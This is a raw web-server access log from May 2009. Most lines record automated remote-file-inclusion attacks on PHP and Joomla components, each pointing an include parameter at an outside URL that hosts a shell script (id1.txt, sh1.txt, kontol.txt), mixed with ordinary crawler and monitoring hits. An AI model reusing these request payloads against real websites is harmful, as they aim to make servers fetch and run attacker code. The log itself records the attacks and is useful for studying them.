85.17.162.28 - - [30/May/2009:00:42:43 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:42:43 -0400] "GET /logs/access_log.Q108031900/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:43:26 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://chicken.ucoz.org/botscan/id.txt???? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
77.79.12.5 - - [30/May/2009:00:43:36 -0400] "GET /logs/error_log.Q109050700/index.php?meio=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
77.79.12.5 - - [30/May/2009:00:43:36 -0400] "GET /index.php?meio=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
77.79.12.5 - - [30/May/2009:00:43:37 -0400] "GET /logs/index.php?meio=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
85.214.83.196 - - [30/May/2009:00:43:37 -0400] "GET /logs/access_log.Q108081500%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:43:37 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:43:37 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.249.68.76 - - [30/May/2009:00:43:48 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3081C943187127004E6D043+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.17.162.28 - - [30/May/2009:00:44:00 -0400] "GET /logs/access_log.Q108031900%20%20/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:44:03 -0400] "GET /logs/access_log.Q108031900/convert/mvcw.php?step=1&vwar_root=http://chicken.ucoz.org/botscan/id.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
85.17.162.28 - - [30/May/2009:00:44:03 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://chicken.ucoz.org/botscan/id.txt???? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
85.17.162.28 - - [30/May/2009:00:44:04 -0400] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://chicken.ucoz.org/botscan/id.txt???? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
69.50.197.106 - - [30/May/2009:00:44:15 -0400] "GET /logs/access_log.Q109052300//admin/business_inc/saveserver.php?thisdir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:44:16 -0400] "GET /logs/access_log.Q109052300//admin/business_inc/saveserver.php?thisdir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:44:55 -0400] "GET /logs/access_log.Q108062400%20%20/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
87.230.85.142 - - [30/May/2009:00:44:58 -0400] "GET /logs/access_log.Q109052200%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
74.208.111.178 - - [30/May/2009:00:46:06 -0400] "GET /logs/access_log.Q109052300//admin/business_inc/saveserver.php?thisdir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
77.79.12.5 - - [30/May/2009:00:46:19 -0400] "GET /logs/error_log.Q109030300/index.php?meio=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
209.59.12.99 - - [30/May/2009:00:46:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.52.2.130 - - [30/May/2009:00:46:38 -0400] "GET /logs/error_log.Q109052000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.810"
74.52.2.130 - - [30/May/2009:00:46:39 -0400] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.810"
74.52.2.130 - - [30/May/2009:00:46:39 -0400] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
85.214.83.196 - - [30/May/2009:00:46:49 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:46:49 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:46:49 -0400] "GET /logs/access_log.Q108081500%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:46:59 -0400] "GET /logs/access_log.Q108031900%20%20/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:47:09 -0400] "GET /logs/access_log.Q108031900%20%20/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:47:14 -0400] "GET /logs/access_log.Q108062400/convert/mvcw.php?step=1&vwar_root=http://chicken.ucoz.org/botscan/id.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
77.79.246.241 - - [30/May/2009:00:47:22 -0400] "GET /logs/zboard.php?id=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:00:47:22 -0400] "GET /zboard.php?id=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:00:47:22 -0400] "GET /logs/access_log.Q109051100%20%20/zboard.php?id=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:00:47:23 -0400] "GET /zboard.php?id=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:00:47:23 -0400] "GET /logs/zboard.php?id=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:00:47:23 -0400] "GET /logs/access_log.Q109051100%20%20/zboard.php?id=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.230.85.142 - - [30/May/2009:00:47:37 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.212.165.114 - - [30/May/2009:00:47:40 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.212.165.114 - - [30/May/2009:00:47:40 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
67.212.165.114 - - [30/May/2009:00:47:40 -0400] "GET /logs/access_log.Q109051000%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:47:49 -0400] "GET /logs/access_log.Q108062400%20%20/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:47:51 -0400] "GET /index2.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:47:51 -0400] "GET /logs/index2.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:47:52 -0400] "GET /logs/access_log.Q109051500%20%20/index2.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:48:01 -0400] "GET /logs/access_log.Q108062400%20%20/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:00:48:34 -0400] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:00:48:34 -0400] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:00:48:56 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:00:48:56 -0400] "GET /logs/access_log.Q108081500%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:00:48:56 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:00:49:19 -0400] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:00:49:19 -0400] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
64.6.231.215 - - [30/May/2009:00:49:27 -0400] "GET //poll/poll_ssi.php?include_path=http://www.waisikkai.com//components/com_registration/test.txt??? HTTP/1.1" 404 216 "-" "Advanced Browser (http://www.avantbrowser.com)"
64.6.231.215 - - [30/May/2009:00:49:27 -0400] "GET /logs//poll/poll_ssi.php?include_path=http://www.waisikkai.com//components/com_registration/test.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
201.232.54.48 - - [30/May/2009:00:50:32 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
75.125.245.26 - - [30/May/2009:00:50:42 -0400] "GET //components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 244 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
75.125.245.26 - - [30/May/2009:00:50:42 -0400] "GET /logs//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 249 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
74.208.111.178 - - [30/May/2009:00:50:52 -0400] "GET /logs/access_log.Q109051800%20%20//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
74.208.111.178 - - [30/May/2009:00:50:52 -0400] "GET //?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
74.208.111.178 - - [30/May/2009:00:50:52 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 200 3433 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:50:54 -0400] "GET //?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:50:54 -0400] "GET /logs/access_log.Q109051800%20%20//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:50:54 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 200 3433 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:00:51:12 -0400] "GET /index2.php?dir=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:00:51:12 -0400] "GET /logs/access_log.Q109051500%20%20/index2.php?dir=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:00:51:12 -0400] "GET /logs/index2.php?dir=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.208.111.178 - - [30/May/2009:00:51:19 -0400] "GET /logs/access_log.Q109051700%20%20//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:51:23 -0400] "GET /logs/access_log.Q109051700%20%20//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:51:24 -0400] "GET /logs/access_log.Q109051800%20%20//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:51:24 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 200 3433 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:51:24 -0400] "GET //?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:00:51:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.50.197.106 - - [30/May/2009:00:51:54 -0400] "GET /logs/access_log.Q109051700%20%20//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:00:53:35 -0400] "GET /logs/access_log.Q109050300%20%20/index2.php?dir=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.228.158.38 - - [30/May/2009:00:55:21 -0400] "GET /index.php?pagina=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
213.228.158.38 - - [30/May/2009:00:55:25 -0400] "GET /logs/access_log.Q109052300/index.php?pagina=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
213.228.158.38 - - [30/May/2009:00:55:26 -0400] "GET /index.php?pagina=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
213.228.158.38 - - [30/May/2009:00:55:26 -0400] "GET /logs/index.php?pagina=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
69.50.197.106 - - [30/May/2009:00:56:02 -0400] "GET /logs/access_log.Q109051800//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:56:13 -0400] "GET /logs/access_log.Q109051700//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:00:56:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.149.157.130 - - [30/May/2009:00:56:55 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
91.149.157.130 - - [30/May/2009:00:56:55 -0400] "GET /logs/error_log.Q108072100/joomla/index.php?option=com_restaurante&task=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
91.149.157.130 - - [30/May/2009:00:56:55 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
91.149.157.130 - - [30/May/2009:00:56:57 -0400] "GET /logs/error_log.Q108060100/joomla/index.php?option=com_restaurante&task=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
67.212.165.114 - - [30/May/2009:00:56:59 -0400] "GET /logs/access_log.Q109052100//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:57:08 -0400] "GET /logs/access_log.Q109051800//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:57:12 -0400] "GET /logs/access_log.Q109051700//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.212.165.114 - - [30/May/2009:00:57:13 -0400] "GET /logs/access_log.Q109051000//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:57:18 -0400] "GET /logs/access_log.Q109052200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:57:19 -0400] "GET /logs/access_log.Q109050300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:58:42 -0400] "GET /logs/access_log.Q109052200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:58:43 -0400] "GET /logs/access_log.Q109050300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
213.228.158.38 - - [30/May/2009:00:58:46 -0400] "GET /logs/access_log.Q109051600/index.php?pagina=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
91.149.157.130 - - [30/May/2009:00:59:45 -0400] "GET /logs/error_log.Q108072100/joomla/index.php?option=com_restaurante&task=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
91.149.157.130 - - [30/May/2009:00:59:45 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
91.149.157.130 - - [30/May/2009:00:59:45 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
91.149.157.130 - - [30/May/2009:00:59:45 -0400] "GET /logs/error_log.Q108060100/joomla/index.php?option=com_restaurante&task=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
209.59.12.99 - - [30/May/2009:01:01:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.181.7.97 - - [30/May/2009:01:02:23 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.64.38 - - [30/May/2009:01:02:50 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
85.23.66.89 - - [30/May/2009:01:04:51 -0400] "GET /robots.txt HTTP/1.0" 404 208 "http://majestic12.co.uk/bot.php?I=9C9BB7B76C-00A0F9232682C757-aceonlinestore_com" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:04:55 -0400] "GET /logs/access_log.Q108100900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:04:59 -0400] "GET /logs/access_log.Q108101400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:01 -0400] "GET /logs/access_log.Q108103100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:04 -0400] "GET /logs/access_log.Q108111200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:05 -0400] "GET /logs/access_log.Q108111600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:07 -0400] "GET /logs/access_log.Q108112100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:09 -0400] "GET /logs/access_log.Q108120300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:10 -0400] "GET /logs/access_log.Q108120600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:15 -0400] "GET /logs/access_log.Q108121600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:19 -0400] "GET /logs/access_log.Q108121900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:21 -0400] "GET /logs/access_log.Q108122200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:22 -0400] "GET /logs/access_log.Q108122600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
91.149.157.130 - - [30/May/2009:01:05:23 -0400] "GET /logs/access_log.Q109051700//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
91.149.157.130 - - [30/May/2009:01:05:23 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
91.149.157.130 - - [30/May/2009:01:05:23 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
85.23.66.89 - - [30/May/2009:01:05:24 -0400] "GET /logs/access_log.Q108123100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:25 -0400] "GET /logs/access_log.Q109010400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
91.149.157.130 - - [30/May/2009:01:05:26 -0400] "GET /logs/error_log.Q108052600/joomla/index.php?option=com_restaurante&task=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
85.23.66.89 - - [30/May/2009:01:05:27 -0400] "GET /logs/access_log.Q109010800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:28 -0400] "GET /logs/access_log.Q109011400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:30 -0400] "GET /logs/access_log.Q109020400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:32 -0400] "GET /logs/access_log.Q109020800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
